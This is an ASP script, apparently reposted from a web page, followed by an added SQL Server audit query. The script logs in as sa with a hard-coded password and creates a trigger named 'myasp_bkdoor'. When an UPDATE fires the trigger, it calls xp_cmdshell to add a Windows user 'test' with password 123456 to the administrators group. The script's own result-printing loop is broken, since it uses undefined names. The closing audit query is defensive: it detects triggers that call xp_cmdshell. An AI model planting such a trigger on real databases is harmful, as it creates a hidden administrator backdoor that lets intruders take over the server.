The code is as follows:

<%
' Change the variable values in here yourself when you use it
On Error Resume next
Set conn=Server.CreateObject("ADODB.Connection")
DSN="driver={SQL Server};Server=(Local)\GSQL;database=baby;uid=sa;pwd=lcx;"
conn.Open DSN
if conn.State=1 then
  response.write("成功")
  sql="CREATE TRIGGER myasp_bkdoor"&Chr(10)&Chr(13)&"ON users_member"&Chr(10)&Chr(13)&"AFTER UPDATE"&Chr(10)&Chr(13)&"AS"&Chr(10)&Chr(13)&"IF user='dbo' OR user='sa'"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'dbo OR sa logon'"&Chr(10)&Chr(13)&"EXEC master..xp_cmdshell'net user test 123456 /add&&net localgroup administrators test /add'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13)&"ELSE"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'not dbo or sa privilage'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13)
  ' Create the myasp_bkdoor trigger; an UPDATE on the users_member table in the baby database fires it and adds a user
  SQL1="update users_member set email=3 where accountid=1" ' Fire the trigger
  'sql2="drop TRIGGER myasp_bkdoor"
  set rs=conn.execute(SQL)&conn.execute(SQL1,iRowsAffected, &H0001)'&conn.execute(SQL2) ' Fire the trigger
  Do Until Rs.EOF
    Response.Write " <tr>" & vbNewLine
    For I = 0 To Rs.Fields.Count - 1
      Response.Write "<td>" & SQLOut(oRs(I)) & "</td>" & vbNewLine
    Next
    Response.Write " </tr>" & vbNewLine
    Rs.MoveNext
  Loop
else
  response.write("失败")
end if
%>
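
A defender-side audit for the technique in the script above, as an added example that is not part of the original page: it reports whether xp_cmdshell is enabled on the instance and lists triggers in the current database whose definition references xp_cmdshell or cannot be read. It assumes SQL Server 2008 or later (catalog views) and an account with VIEW DEFINITION rights; the column aliases and finding labels are illustrative.

```sql
-- Added example, not from the original page.
-- Assumes SQL Server 2008+ and VIEW DEFINITION permission in the database.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means a trigger like the one
--    above can reach the operating system.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';

-- 2. Triggers that call xp_cmdshell, or whose T-SQL text is not visible
--    (WITH ENCRYPTION or CLR), newest modification first.
SELECT
    t.name                          AS trigger_name,
    t.type_desc                     AS trigger_type,      -- SQL_TRIGGER / CLR_TRIGGER
    t.parent_class_desc             AS scope,             -- OBJECT_OR_COLUMN / DATABASE
    OBJECT_SCHEMA_NAME(t.parent_id) AS parent_schema,     -- NULL for database-level triggers
    OBJECT_NAME(t.parent_id)        AS parent_object,
    t.is_disabled,
    t.create_date,
    t.modify_date,
    CASE
        WHEN m.definition IS NULL THEN 'no readable T-SQL text (encrypted or CLR)'
        ELSE 'references xp_cmdshell'
    END                             AS finding
FROM sys.triggers AS t
LEFT JOIN sys.sql_modules AS m
       ON m.object_id = t.object_id
WHERE t.is_ms_shipped = 0
  AND (
        m.definition IS NULL
        -- [_] matches a literal underscore; a bare _ is a LIKE wildcard.
        -- LOWER() keeps the match working under case-sensitive collations.
        OR LOWER(m.definition) LIKE N'%xp[_]cmdshell%'
      )
ORDER BY t.modify_date DESC;
```

Run it in each user database, since sys.triggers is per-database; a trigger whose create_date or modify_date does not line up with a known deployment is the one to review first.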